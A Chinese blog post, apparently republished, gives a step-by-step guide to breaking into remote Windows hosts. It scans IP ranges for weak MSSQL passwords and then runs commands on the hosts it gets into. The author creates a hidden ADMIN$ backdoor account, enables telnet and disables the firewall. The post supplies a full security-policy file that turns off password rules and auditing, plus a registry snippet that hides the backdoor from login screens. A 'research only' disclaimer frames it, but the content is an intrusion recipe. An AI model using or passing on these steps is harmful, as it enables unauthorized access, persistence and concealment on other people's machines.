利用流光扫描的SQL弱密码 入侵远程机子

2023-12-11 05:48

本文主要是介绍利用流光扫描的SQL弱密码 入侵远程机子,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

 

 

 

 

注意: 本文之目的仅在研究信息安全的攻防策略  严禁用于非法目的 :》

 

 

 

下面一部分 转载在网络 在此谢谢作者

 


流光的SQL探测,顺便说说ipc$补遗和其它的探测手段。

一、目的和任务:

1、用流光的SQL探测获得一台NT主机的管理权限。
2、学习SQL探测的相关知识。
3、IPC$补遗和其它…
二、探测流程:

1、你得有流光,这话不用在说了吧:)

什么是SQL:

 

 

SQL:微软开发的数据库,专门用在微软的OS上,功能类似Linux 下的Mysql,晕……,到底谁类似谁啊?有时间

       去看看SQL的联机手册,说的很明白。

SQL服务程序支持的网络协议:

Named pipes :使用NT SMB端口来进行通信,存在被SNIFFER截获数据的危险。

IP Sockets     :默认状态下开1433端口,可以被扫描器探测,存在被SNIFFER截获数据的危险。

Multi-Protocol :客户端需要支持NT RPCs,数据加密。

NWLink :存在被SNIFFER截获数据的危险。

AppleTalk (ADSP):存在被SNIFFER截获数据的危险

Banyan Vines :存在被SNIFFER截获数据的危险

在Internet上,95%以上的SQL Server 采用的都是IP Sockets协议,流光探测的就是这个协议默认的1433端口


2、我们要获得SQL 主机的管理权限,那么还用命中率高的办法来探测了(测试一堆IP来得到弱口令)。

对一台固定主机的探测等我下期的教程:)

在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。


图main

 

 

3、出先了下面的小窗口,输入我们要破解的IP段,我们输入了来看看。(注意如果你要探测的是流光保留的国内的IP段,会被禁止的,也就是探测的时候信息栏出现“地址保留的信息”)
图inputip

 

 

 

 

 

4、探测中……

5、有密码了:)     图psss 1→3

 

 

 

 

 

 

 

6、下面我们进一部获取管理员的权限。
      用SQL 客户端去连接主机,没有装SQL :( ……………… 没关系,流光自带了连接的工具,以前我一直都是用的天行的工具SQLexec,但现在可以不用它了。

打开菜单 工具 → MSSQL工具 → SQL远程命令看看:)
      图tools

 

 

 

 

 

 

7、获得管理权限、增加后门

 


图cmdline

 

 

 

 

 

以上内容转载自网络   以下内容 为自己实践时所做 接上面的步骤 从步骤9 开始计数吧

 

 

步骤9  我们获得对方的DOS操作系统后 ,首先建立一个后门账号,然后开启对方的TELNET

 

注意 此处使用的是ADMIN$  这样的话 即使用net user 查看 也不会找到这个隐藏的账号的

 

 

 

 

步骤10  打开对方的TELNET

 

 

 

 

 

 

当我们TELNET对方机子时 可能出现如下问题:

 

 

 

 

 

问题是 我们已经打开了对方的TELNET端口 为啥还会出现这个错误呢 ?

 

原因是 被对方的防火墙阻拦了

 

这样的话, 我们使用dos 命令关闭Windows自带的防火墙

 

 

 

这样就应该能TELNET进对方的机子了

 

果还不行的话 在关闭360的主动防御  ,  但是我没有找到关闭360防火墙的命令  用各种方式都没有能够关闭360rp.exe这个进程,如果有知道关闭方法的话  ,可以告知下不?

 

 

 

好 ,这样我们就TELNET进了远方的机子

 

 步骤11 

 

          如果是WIN2000的机子 我们这时可以用IPC连接 将对方的各个盘映射过来,可是现在有谁还用WIN2000呢? 不要告诉我,你还在用吧:》

 

          XP的安全性比2000好多了 ,默认情况下 是不能进行IPC连接的 权限很低  必须修改一下组策略 将仅来宾更改为经典登录才可

 

          关键是,TELNET远程机子如何更改组策略呢 ,因为XP已经不能用远程注册表修改了,所以必须考虑其他的方法

 

          那就是,往对方机子里拷贝文件,让其更改组策略

 

          所以,要解决的一个问题,便是,如何在TELNET中下载上传文件

 

          也看了很多资料,都是要用工具 , 其实用WINDOWS 自带的IIS中的FTP就很好用

 

          首先设置一下IIS中的FTP服务  假设,本机IP为10.10.10.10

 

然后就可在远程 登录本机的FTP服务 ,在TELNET环境下运行

 

 

ftp 10.10.10.10 

 

然后根据提示,写入本机FTP登录的用户和密码

 

就可以了

 

然后在使用 get  file.txt  就下载本机ftp目录中的file文件了

 

 

步骤 11.1  组策略

 

 

这一段是转载的,大家可以去网上搜一下 我也给出了参考资料 ,感谢作者:》

 

先来补充一个知识点:命令行下的组策略 secedit
组策略是建立Windows安全环境的重要手段,尤其是在Windows域环境下。一个出色的系统管理员,应该能熟练地掌握并应用组策略。在窗口界面下访问组策略用gpedit.msc,命令行下用secedit.exe
secedit命令语法:
secedit /analyze
secedit /configure
secedit /export
secedit /validate
secedit /refreshpolicy
5个命令的功能分别是分析组策略、配置组策略、导出组策略、验证模板语法和更新组策略。其中secedit /refreshpolicy XP/2003下被gpupdate代替。这些命令具体的语法自己在命令行下查看就知道了。
与访问注册表只需reg文件不同的是,访问组策略除了要有个模板文件(还是inf),还需要一个安全数据库文件(sdb)。要修改组策略,必须先将模板导入安全数据库,再通过应用安全数据库来刷新组策略
 
看到这里我想大家应该知道该做什么了吧,对,就是用它来修改被锁住的计算机策略。
大体的过程是这样:
1   telnet到远程计算机
2   导出组策略配置
3   修改组策略配置
4   应用新的组策略配置

 

 

  

。。。

 

下面是自己修改好的组策略.INF  直接导入进去 更新下组策略就可以,不过现在看来是走了个弯路,直接用注册表更改下更简单

 

这是我修改后的secedit.inf

 

[Unicode]
Unicode=yes
[System Access]
MinimumPasswordAge = 0
MaximumPasswordAge = -1
MinimumPasswordLength = 0
PasswordComplexity = 0
PasswordHistorySize = 0
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ForceLogoffWhenHourExpire = 0
NewAdministratorName = "Administrator"
NewGuestName = "Guest"
ClearTextPassword = 0
LSAAnonymousNameLookup = 0
EnableAdminAccount = 1
EnableGuestAccount = 1
[Event Audit]
AuditSystemEvents = 0
AuditLogonEvents = 0
AuditObjectAccess = 0
AuditPrivilegeUse = 0
AuditPolicyChange = 0
AuditAccountManage = 0
AuditProcessTracking = 0
AuditDSAccess = 0
AuditAccountLogon = 0
[Registry Values]
MACHINE/Software/Microsoft/Driver Signing/Policy=3,1
MACHINE/Software/Microsoft/Windows NT/CurrentVersion/Setup/RecoveryConsole/SecurityLevel=4,0
MACHINE/Software/Microsoft/Windows NT/CurrentVersion/Setup/RecoveryConsole/SetCommand=4,0
MACHINE/Software/Microsoft/Windows NT/CurrentVersion/Winlogon/AllocateCDRoms=1,"0"
MACHINE/Software/Microsoft/Windows NT/CurrentVersion/Winlogon/AllocateDASD=1,"0"
MACHINE/Software/Microsoft/Windows NT/CurrentVersion/Winlogon/AllocateFloppies=1,"0"
MACHINE/Software/Microsoft/Windows NT/CurrentVersion/Winlogon/CachedLogonsCount=1,"10"
MACHINE/Software/Microsoft/Windows NT/CurrentVersion/Winlogon/ForceUnlockLogon=4,0
MACHINE/Software/Microsoft/Windows NT/CurrentVersion/Winlogon/PasswordExpiryWarning=4,14
MACHINE/Software/Microsoft/Windows NT/CurrentVersion/Winlogon/ScRemoveOption=1,"0"
MACHINE/Software/Microsoft/Windows/CurrentVersion/Policies/System/DontDisplayLastUserName=4,0
MACHINE/Software/Microsoft/Windows/CurrentVersion/Policies/System/LegalNoticeText=7,
MACHINE/Software/Microsoft/Windows/CurrentVersion/Policies/System/ShutdownWithoutLogon=4,1
MACHINE/Software/Microsoft/Windows/CurrentVersion/Policies/System/UndockWithoutLogon=4,1
MACHINE/System/CurrentControlSet/Control/Lsa/AuditBaseObjects=4,0
MACHINE/System/CurrentControlSet/Control/Lsa/CrashOnAuditFail=4,0
MACHINE/System/CurrentControlSet/Control/Lsa/DisableDomainCreds=4,0
MACHINE/System/CurrentControlSet/Control/Lsa/EveryoneIncludesAnonymous=4,0
MACHINE/System/CurrentControlSet/Control/Lsa/FIPSAlgorithmPolicy=4,0
MACHINE/System/CurrentControlSet/Control/Lsa/ForceGuest=4,0
MACHINE/System/CurrentControlSet/Control/Lsa/FullPrivilegeAuditing=3,0
MACHINE/System/CurrentControlSet/Control/Lsa/LimitBlankPasswordUse=4,1
MACHINE/System/CurrentControlSet/Control/Lsa/LmCompatibilityLevel=4,0
MACHINE/System/CurrentControlSet/Control/Lsa/MSV1_0/NTLMMinClientSec=4,0
MACHINE/System/CurrentControlSet/Control/Lsa/MSV1_0/NTLMMinServerSec=4,0
MACHINE/System/CurrentControlSet/Control/Lsa/NoDefaultAdminOwner=4,1
MACHINE/System/CurrentControlSet/Control/Lsa/NoLMHash=4,0
MACHINE/System/CurrentControlSet/Control/Lsa/RestrictAnonymous=4,0
MACHINE/System/CurrentControlSet/Control/Lsa/RestrictAnonymousSAM=4,1
MACHINE/System/CurrentControlSet/Control/Print/Providers/LanMan Print Services/Servers/AddPrinterDrivers=4,0
MACHINE/System/CurrentControlSet/Control/SecurePipeServers/Winreg/AllowedPaths/Machine=7,System/CurrentControlSet/Control/ProductOptions,System/CurrentControlSet/Control/Print/Printers,System/CurrentControlSet/Control/Server Applications,System/CurrentControlSet/Services/Eventlog,Software/Microsoft/OLAP Server,Software/Microsoft/Windows NT/CurrentVersion,System/CurrentControlSet/Control/ContentIndex,System/CurrentControlSet/Control/Terminal Server,System/CurrentControlSet/Control/Terminal Server/UserConfig,System/CurrentControlSet/Control/Terminal Server/DefaultUserConfiguration
MACHINE/System/CurrentControlSet/Control/Session Manager/Kernel/ObCaseInsensitive=4,1
MACHINE/System/CurrentControlSet/Control/Session Manager/ProtectionMode=4,1
MACHINE/System/CurrentControlSet/Services/LanManServer/Parameters/AutoDisconnect=4,15
MACHINE/System/CurrentControlSet/Services/LanManServer/Parameters/EnableForcedLogOff=4,1
MACHINE/System/CurrentControlSet/Services/LanManServer/Parameters/EnableSecuritySignature=4,0
MACHINE/System/CurrentControlSet/Services/LanManServer/Parameters/NullSessionPipes=7,COMNAP,COMNODE,SQL/QUERY,SPOOLSS,LLSRPC,browser
MACHINE/System/CurrentControlSet/Services/LanManServer/Parameters/NullSessionShares=7,COMCFG,DFS$
MACHINE/System/CurrentControlSet/Services/LanManServer/Parameters/RequireSecuritySignature=4,0
MACHINE/System/CurrentControlSet/Services/LanmanWorkstation/Parameters/EnablePlainTextPassword=4,0
MACHINE/System/CurrentControlSet/Services/LanmanWorkstation/Parameters/EnableSecuritySignature=4,1
MACHINE/System/CurrentControlSet/Services/LanmanWorkstation/Parameters/RequireSecuritySignature=4,0
MACHINE/System/CurrentControlSet/Services/LDAP/LDAPClientIntegrity=4,1
MACHINE/System/CurrentControlSet/Services/Netlogon/Parameters/DisablePasswordChange=4,0
MACHINE/System/CurrentControlSet/Services/Netlogon/Parameters/MaximumPasswordAge=4,30
MACHINE/System/CurrentControlSet/Services/Netlogon/Parameters/RequireSignOrSeal=4,1
MACHINE/System/CurrentControlSet/Services/Netlogon/Parameters/RequireStrongKey=4,0
MACHINE/System/CurrentControlSet/Services/Netlogon/Parameters/SealSecureChannel=4,1
MACHINE/System/CurrentControlSet/Services/Netlogon/Parameters/SignSecureChannel=4,1
[Privilege Rights]
SeNetworkLogonRight = *S-1-1-0,IUSR_PC-201005290854,IWAM_PC-201005290854,ASPNET,*S-1-5-32-544,*S-1-5-32-545,*S-1-5-32-547,*S-1-5-32-551
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551
SeChangeNotifyPrivilege = *S-1-1-0,SQLServer2005MSSQLUser$PC-201005290854$SQLEXPRESS,SQLServer2005DTSUser$PC-201005290854,SQLServer2005SQLAgentUser$PC-201005290854$MSSQLSERVER,SQLServer2005MSSQLUser$PC-201005290854$MSSQLSERVER,SQLServer2005MSFTEUser$PC-201005290854$MSSQLSERVER,*S-1-5-32-544,*S-1-5-32-545,*S-1-5-32-547,*S-1-5-32-551
SeSystemtimePrivilege = *S-1-5-32-544,*S-1-5-32-547
SeCreatePagefilePrivilege = *S-1-5-32-544
SeDebugPrivilege = *S-1-5-32-544
SeRemoteShutdownPrivilege = *S-1-5-32-544
SeAuditPrivilege = *S-1-5-19,*S-1-5-20
SeIncreaseQuotaPrivilege = *S-1-5-19,*S-1-5-20,IWAM_PC-201005290854,SQLServer2005MSSQLUser$PC-201005290854$SQLEXPRESS,SQLServer2005SQLAgentUser$PC-201005290854$MSSQLSERVER,SQLServer2005MSSQLUser$PC-201005290854$MSSQLSERVER,SQLServer2005MSFTEUser$PC-201005290854$MSSQLSERVER,*S-1-5-32-544
SeIncreaseBasePriorityPrivilege = *S-1-5-32-544
SeLoadDriverPrivilege = *S-1-5-32-544
SeBatchLogonRight = SUPPORT_388945a0,IUSR_PC-201005290854,IWAM_PC-201005290854,SQLServer2005MSSQLUser$PC-201005290854$SQLEXPRESS,SQLServer2005SQLAgentUser$PC-201005290854$MSSQLSERVER,SQLServer2005MSSQLUser$PC-201005290854$MSSQLSERVER,SQLServer2005MSFTEUser$PC-201005290854$MSSQLSERVER,ASPNET
SeServiceLogonRight = *S-1-5-20,SQLServer2005SQLBrowserUser$PC-201005290854,SQLServer2005MSSQLUser$PC-201005290854$SQLEXPRESS,SQLServer2005DTSUser$PC-201005290854,SQLServer2005SQLAgentUser$PC-201005290854$MSSQLSERVER,SQLServer2005MSSQLUser$PC-201005290854$MSSQLSERVER,SQLServer2005MSFTEUser$PC-201005290854$MSSQLSERVER,SQLServer2005MSOLAPUser$PC-201005290854$MSSQLSERVER,SQLServer2005NotificationServicesUser$PC-201005290854,SQLServer2005ReportServerUser$PC-201005290854$MSSQLSERVER,ASPNET
SeInteractiveLogonRight = IUSR_PC-201005290854,Guest,*S-1-5-32-544,*S-1-5-32-545,*S-1-5-32-547,*S-1-5-32-551
SeSecurityPrivilege = *S-1-5-32-544
SeSystemEnvironmentPrivilege = *S-1-5-32-544
SeProfileSingleProcessPrivilege = *S-1-5-32-544,*S-1-5-32-547
SeSystemProfilePrivilege = *S-1-5-32-544
SeAssignPrimaryTokenPrivilege = *S-1-5-19,*S-1-5-20,IWAM_PC-201005290854,SQLServer2005MSSQLUser$PC-201005290854$SQLEXPRESS,SQLServer2005SQLAgentUser$PC-201005290854$MSSQLSERVER,SQLServer2005MSSQLUser$PC-201005290854$MSSQLSERVER,SQLServer2005MSFTEUser$PC-201005290854$MSSQLSERVER
SeRestorePrivilege = *S-1-5-32-544,*S-1-5-32-551
SeShutdownPrivilege = *S-1-5-32-544,*S-1-5-32-545,*S-1-5-32-547,*S-1-5-32-551
SeTakeOwnershipPrivilege = *S-1-5-32-544
SeDenyNetworkLogonRight = SUPPORT_388945a0,Guest
SeDenyInteractiveLogonRight = SUPPORT_388945a0,ASPNET,Guest
SeUndockPrivilege = *S-1-5-32-544,*S-1-5-32-545,*S-1-5-32-547
SeManageVolumePrivilege = *S-1-5-32-544
SeRemoteInteractiveLogonRight = *S-1-5-32-544,*S-1-5-32-555
SeDenyRemoteInteractiveLogonRight = ASPNET
SeImpersonatePrivilege = SQLServer2005DTSUser$PC-201005290854,ASPNET,*S-1-5-32-544,*S-1-5-6
SeCreateGlobalPrivilege = SQLServer2005DTSUser$PC-201005290854,*S-1-5-32-544,*S-1-5-4,*S-1-5-6
[Version]
signature="$CHICAGO$"
Revision=1

 

然后把这个文件 上传到远程机子上,

 

 

 

 

 

这样更改组策略,有点麻烦,大家还可以试着更改注册表的方法更简单 ,下次试验下 :》

 

[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Lsa]
"forceguest"=dword:00000001   (仅来宾)

 

 

这样 就更改了 对方的组策略 ,下面就可以使用IPC映射对方盘了

 

 

 

 

 

 

 

 

好了  到此,任务基本完成了 ,但是对方如果重启机子后,可能就会发现这个后门账号ADMIN$

 

  怎么办呢 ?  更改下注册表就可以了

将下面文字 保存为.reg 然后放到远程机上运行

 

REGEDIT4

 

[HKEY_LOCAL_MACHINE/SOFTWARE/MICROSOFT/WINDOWS NT/CURRENTVERSION/WINLOGON/SPECIALACCOUNTS/USERLIST]
"ADMIN$"=dword:00000000

 

 

注意,windows  NT      中间有空格  省略空格的话  虽导入进去了 但实际并没有修改注册表

 

 

 

 

 

这样,建立的后门账号便会隐匿无踪,轻易不会找到的:》

 

 

参考资料:

 

流光: http://blog.163.com/itohok@126/blog/static/4815666220104229446512/

 

组策略: http://struggle.blog.51cto.com/333093/91862

 

注册表修改仅来宾: http://zhidao.baidu.com/question/116495980.html

 

reg修改注册表: http://huangqiangstc.blog.sohu.com/142584340.html

 

 

 

 

 

这篇关于利用流光扫描的SQL弱密码 入侵远程机子的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/479633

相关文章

Mysql数据库聚簇索引与非聚簇索引举例详解

《Mysql数据库聚簇索引与非聚簇索引举例详解》在MySQL中聚簇索引和非聚簇索引是两种常见的索引结构,它们的主要区别在于数据的存储方式和索引的组织方式,:本文主要介绍Mysql数据库聚簇索引与非... 目录前言一、核心概念与本质区别二、聚簇索引(Clustered Index)1. 实现原理(以 Inno

sqlserver、mysql、oracle、pgsql、sqlite五大关系数据库的对象名称和转义字符

《sqlserver、mysql、oracle、pgsql、sqlite五大关系数据库的对象名称和转义字符》:本文主要介绍sqlserver、mysql、oracle、pgsql、sqlite五大... 目录一、转义符1.1 oracle1.2 sqlserver1.3 PostgreSQL1.4 SQLi

MySQL数据库双机热备的配置方法详解

《MySQL数据库双机热备的配置方法详解》在企业级应用中,数据库的高可用性和数据的安全性是至关重要的,MySQL作为最流行的开源关系型数据库管理系统之一,提供了多种方式来实现高可用性,其中双机热备(M... 目录1. 环境准备1.1 安装mysql1.2 配置MySQL1.2.1 主服务器配置1.2.2 从

深入理解Mysql OnlineDDL的算法

《深入理解MysqlOnlineDDL的算法》本文主要介绍了讲解MysqlOnlineDDL的算法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小... 目录一、Online DDL 是什么?二、Online DDL 的三种主要算法2.1COPY(复制法)

mysql8.0.43使用InnoDB Cluster配置主从复制

《mysql8.0.43使用InnoDBCluster配置主从复制》本文主要介绍了mysql8.0.43使用InnoDBCluster配置主从复制,文中通过示例代码介绍的非常详细,对大家的学习或者... 目录1、配置Hosts解析(所有服务器都要执行)2、安装mysql shell(所有服务器都要执行)3、

k8s中实现mysql主备过程详解

《k8s中实现mysql主备过程详解》文章讲解了在K8s中使用StatefulSet部署MySQL主备架构,包含NFS安装、storageClass配置、MySQL部署及同步检查步骤,确保主备数据一致... 目录一、k8s中实现mysql主备1.1 环境信息1.2 部署nfs-provisioner1.2.

MySQL中VARCHAR和TEXT的区别小结

《MySQL中VARCHAR和TEXT的区别小结》MySQL中VARCHAR和TEXT用于存储字符串,VARCHAR可变长度存储在行内,适合短文本;TEXT存储在溢出页,适合大文本,下面就来具体的了解... 目录一、VARCHAR 和 TEXT 基本介绍1. VARCHAR2. TEXT二、VARCHAR

MySQL中C接口的实现

《MySQL中C接口的实现》本节内容介绍使用C/C++访问数据库,包括对数据库的增删查改操作,主要是学习一些接口的调用,具有一定的参考价值,感兴趣的可以了解一下... 目录准备mysql库使用mysql库编译文件官方API文档对象的创建和关闭链接数据库下达sql指令select语句前言:本节内容介绍使用C/

mybatis直接执行完整sql及踩坑解决

《mybatis直接执行完整sql及踩坑解决》MyBatis可通过select标签执行动态SQL,DQL用ListLinkedHashMap接收结果,DML用int处理,注意防御SQL注入,优先使用#... 目录myBATiFBNZQs直接执行完整sql及踩坑select语句采用count、insert、u

java程序远程debug原理与配置全过程

《java程序远程debug原理与配置全过程》文章介绍了Java远程调试的JPDA体系,包含JVMTI监控JVM、JDWP传输调试命令、JDI提供调试接口,通过-Xdebug、-Xrunjdwp参数配... 目录背景组成模块间联系IBM对三个模块的详细介绍编程使用总结背景日常工作中,每个程序员都会遇到bu